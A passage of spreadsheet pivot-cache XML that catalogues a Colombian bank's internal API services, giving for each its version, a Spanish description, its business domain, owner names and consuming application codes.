    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001 _x000d__x000a_NU0021001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago En Efectivo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este Producto API permite la gestión de pagos en efectivo por Corresponsal Bancario; a través de las operaciones construidas en esta API, se podrá ejecutar el pago a un beneficiario y se podrá realizar la anulación de una pago (Por errores como TimeOut o desconexión de la red)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1151001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago Leasing"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio encargado de acreditar los pagos para el proyecto de transformación digital"/>
    <s v="LEASING"/>
    <s v="Leasing"/>
    <s v="Leasing"/>
    <s v="Productor"/>
    <s v="Administración del ciclo de vida del activo"/>
    <s v="Juan Pablo Bahamon Betancur"/>
    <m/>
    <m/>
    <s v="AW0360006"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Pago Programado"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="Se ha creado version para agregar dos operaciones, crear y actualizar programación de pago"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <s v="Doreley Estrada Ramirez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion PQRS"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionPQRS permitirá a los consumidores crear, modificar y consultar los casos de petición, quejas o reclamos en el sistema de almacenamiento de PQRS. "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="Esteban Arroyave Montoya"/>
    <m/>
    <m/>
    <s v="NU0010001 _x000d__x000a_AW1218001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0150001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Precalculado Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar la base de datos de productos pre-calculado para los clientes, habilitando su consulta desde los diferentes canales y actualización de estado cuando el producto se haya entregado al cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="BD Grupo de Riesgos"/>
    <s v="AW1177 _x000d__x000a_AW0937 _x000d__x000a_ELIBOM _x000d__x000a_AW0856 _x000d__x000a_SVP _x000d__x000a_AW1128 _x000d__x000a_APP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Precalculado Cliente"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar la base de datos de productos pre-calculado para los clientes, habilitando su consulta desde los diferentes canales y actualización de estado cuando el producto se haya entregado al cliente."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Riesgos"/>
    <s v="Ciclo de Crédito"/>
    <s v="Productor"/>
    <s v="Ecosistema de Riesgo de Crédito"/>
    <s v="Juliana Medina Martinez"/>
    <m/>
    <s v="BD Grupo de Riesgos"/>
    <s v="APIC _x000d__x000a_AW0937 _x000d__x000a_AW1285001 _x000d__x000a_AW1299001 _x000d__x000a_AW1316001 _x000d__x000a_SVP _x000d__x000a_AW1177001 _x000d__x000a_AW1170 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_APP _x000d__x000a_AW1313001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Puntos Colombia"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio permitirá realizar la integración necesaria contra el tercero Puntos Colombia donde se encuentran los puntos consolidados (Bancolombia y Éxito) programa de fidelización de clientes del proyecto Lealtad. "/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Ventas Digitales y Tecnologias de Mercadeo"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicio-Puntos-Colombia_NU0016001"/>
    <s v="SVP _x000d__x000a_GDE _x000d__x000a_APP _x000d__x000a_AUD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Realce Tarjetas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="GestionRealceTarjetaCredito ofrece a sus consumidores la opción de enviar los datos para el realce de una Tarjeta de Crédito"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <s v="Tarjetas Vision Plus_ISTVP001"/>
    <s v="TVP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Recaudo DIAN"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite el recaudo realizando la consulta y la notificación de los clientes con la DIAN en tiempo real."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="DIAN"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Rediferidos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="En esta versión el servicio expone capacidades que permite al usuario consultar la información de rediferidos a través del tipo de documento y numero de documento también permite registrar el mantenimiento respectivo si el mismo es aceptado."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Crédito"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="AW1313"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Relacion Producto Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio tiene como alcance realizar la creación o actualización de los registros en el archivo CXREF (archivo del iSeries que contiene la relación cliente-producto)."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="AW1078 _x000d__x000a_AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Remesas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Remesas, administra las remesas del exterior que son enviadas para ser pagadas en Bancolombia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Sesion"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionSesion permite la administración de sesiones de un cliente autenticado contra un canal virtual del banco. Ofrece operaciones para la validar, cerrar y mantener (keep-alive) una sesión, asi como también un mecanismo para compartir una sesión de un canal a otro y así habilitar el single sign on entre canales."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="NU0017001 _x000d__x000a_NU0034001 _x000d__x000a_AW0360004 _x000d__x000a_AW0278001 _x000d__x000a_AW1240001 _x000d__x000a_AW1281002 _x000d__x000a_NU0021001 _x000d__x000a_NU0143001 _x000d__x000a_SVP _x000d__x000a_NU0104001 _x000d__x000a_AW1059001 _x000d__x000a_AW1165 _x000d__x000a_AW0453001 _x000d__x000a_NU0004001 _x000d__x000a_AW1128 _x000d__x000a_AW1281003 _x000d__x000a_AW0360006 _x000d__x000a_NU0014001 _x000d__x000a_APP _x000d__x000a_AW1312001 _x000d__x000a_AW0955 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_AW1203001 _x000d__x000a_NU0035001 _x000d__x000a_AW1218001 _x000d__x000a_NU0046001 _x000d__x000a_AW1291001 _x000d__x000a_NU0094001 _x000d__x000a_NU0162001 _x000d__x000a_AW1435001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion SimCard"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio que permite realizar la consulta de la última reexpedición de una simcard, por medio del número telefónico asociado a esta._x000a_ Servicio configurado temporalmente para los operados Movistar y Claro._x000a_ "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <s v="Servicios Riesgos_NA_AW1086001"/>
    <s v="AW1086001 _x000d__x000a_SSC _x000d__x000a_AW1287 _x000d__x000a_AW1313001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1177 _x000d__x000a_AW0937"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW0937 _x000d__x000a_AW1148001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Solicitud Credito Consumo"/>
    <n v="120"/>
    <s v="No Aplica"/>
    <s v="El servicio permite gestionar el proceso de ventas digitales de algún producto de crédito de consumo (pre-aprobados, tarjeta de crédito, crediágil, presta-nómina y libranza) , permitiendo la creación del caso y su avance entre cada uno de los puntos de interacción con el consumidor."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Automatización de Procesos "/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Bizagi Go_AW0856001"/>
    <s v="AW1177"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjeta Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El componente permite realizar compras con tarjetas de crédito sin pasar por la redes, únicamente deberá estar enrolado como medio de pago de uno de los aliados comerciales del Banco."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjeta Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <s v="Modulo de Administración de Tarjetas (MAT)_Tarjeta débito_ISMAT0001"/>
    <s v="AW1150"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Credito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Tarjetas Crédito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta de Crédito y se describen brevemente a continuación  - Validar código de seguridad"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1316001 _x000d__x000a_NU0103001 _x000d__x000a_NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Tarjetas Crédito permite realizar novedades sobre el producto Tarjetas de Crédito, tales como:  • Crear tarjeta • Bloquear tarjeta • Activar tarjeta  Actualmente sólo está disponible la capacidad de Creación de Tarjetas"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="AW1285001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Debito"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Tarjetas Débito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta Débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="NU0100001 _x000d__x000a_PRODUCTORCONSUMIDOR _x000d__x000a_NU0104001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tarjetas Debito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Tarjetas Débito permite exponer las diferentes capacidades de novedades y validaciones que se pueden aplicar sobre el Producto Tarjeta Débito."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Débito"/>
    <s v="Soledad Morales Llano"/>
    <m/>
    <m/>
    <s v="AW1177 _x000d__x000a_NU0021001 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Tasa Pactada"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Tasa Pactada permitirá realizar la gestión de las tasas pactadas, inicialmente permitirá consultar las tasas que ha pactado el cliente."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="DEVELOPSOATEST _x000d__x000a_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Transferencias Internacionales"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="SWIFT_SWIFT_AW0290001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Transferencias Internacionales"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Transferencias Internacionales permitirá a los consumidores consultar información relacionada con los costos, detalles, y seguimiento de una transferencia internacional vía Swift, además de notificar a Swift detalles cuando actuamos como receptor de una transferencia.   Se genera nueva versión 2.0.0. haciendo referencia a la versión 3 del GPI."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="SWIFT_SWIFT_AW0290001"/>
    <s v="CDE _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario Credito Consumo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La creación y/o actualización de un usuario en el DA host to Host para la unidad Organizativa de Sufi en la cual van a estar matriculados  los vendedores de los comercios afiliados y usuarios internos que harán uso de la aplicación ConSufi,  El registro de dicho usuario en la aplicación responsable de la gestión de contraseñas – Biovoz, esto es la creación y/actualización._x005f_x000D_ _x005f_x000D_ El envío del token al usuario para que efectúe el enrolamiento de la voz._x005f_x000D_ _x005f_x000D_ Para ello hará uso de los servicios GestionUsuarioDA, RegistroUsuarioValidacionBiometrica y EnviarNotificacion."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="APP-Sufi_AW1209001"/>
    <s v="AW1081001 _x000d__x000a_TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario DATerceros"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio a través del cual se efectuará la creación y/o actualización de un usuario en el Directorio Activo Host to Host para la Unidad Organizativa de Sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <m/>
    <s v="TP"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuario Valores"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio GestionUsuarioValores permitirá a los consumidores autenticar a un usuario mediante número de documento y contraseña. La idea fundamental es migrar la arquitectura del Audiovalor para una arquitectura estable y escalable que permita estabilizar la sucursal telefónica de valores Bancolombia"/>
    <s v="NEGOCIOS_DE_INVERSION"/>
    <s v="Valores"/>
    <s v="Inversiones"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <s v="Servicios Valores_AW1273001"/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestion Usuarios Divisas"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Gestión Usuarios Divisas tiene como objetivo realizar funcionalidades para la consulta o creación de un usuario no cliente Bancolombia que requiera realizar una operación de compra o venta de divisas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Comercio Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="CIB_ISCIB0001"/>
    <s v="AW1011"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar CDT"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio tiene como propósito llevar a cabo todas las novedades que se le pueden realizar a un CDT, las cuales pueden incluir, modificaciones a las condiciones comerciales. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Maria Isabel Gutierrez"/>
    <m/>
    <s v="FINACLE 10.2.17_CDT_AW1078001"/>
    <s v="SU2 _x000d__x000a_AW0210001 _x000d__x000a_SU5 _x000d__x000a_SVE"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Documentos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio de gestionar documentos tiene como propósito virtualizar las funcionalidades expuestas por los aplicativos de Gestión Documental y de Proveedor de Servicios para la validación y posterior almacenamiento de información, requerida a los clientes por parte de los productos o procesos del Banco."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0499 _x000d__x000a_AW0856 _x000d__x000a_AW0611001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Giros"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Gestionar Giros"/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Servicios e Integració​​​​​​​​​​​​​​n"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <m/>
    <m/>
    <m/>
    <s v="No Tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Llaves"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Sincroniza las llaves de un cliente creadas en uno o más sistemas Back-end del grupo Bancolombia."/>
    <s v="INFORMACION"/>
    <s v="MDM"/>
    <s v="DATOS, ANALÍTICA, IA, BLOCKCHAIN"/>
    <s v="Productor"/>
    <s v="MDM"/>
    <s v="Claudia Marcela Arias Orozco"/>
    <m/>
    <s v="Hub de Información_Entrega de informacion_AW0846001"/>
    <s v="AW0611001 _x000d__x000a_AW0709001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Metadata_BB5"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite la actualización de las novedades de información de los atributos (metadatos) generados en los gestores documentales de terceros, en el servidor de contenido de Bancolombia. Este servicio adicionalmente permite registrar nuevos documentos con sus respectivos atributos (metadatos) en el servidor de contenido de Bancolombia."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="ACTUALIZACION DE METADATA_AW0500001"/>
    <s v="AW0718001 _x000d__x000a_AW0550 _x000d__x000a_Carvajal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Gestionar Pagare Electronico"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Servicio creado para ser invocado por cualquier aplicación que requiera llevar a cabo la administración del pagaré electrónico mediante el uso de los servicios ofrecidos por Deceval."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Deceval"/>
